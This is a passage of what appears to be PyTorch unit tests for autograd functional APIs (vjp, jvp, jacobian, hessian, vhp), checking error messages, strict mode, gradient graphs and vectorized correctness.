inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.randn([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
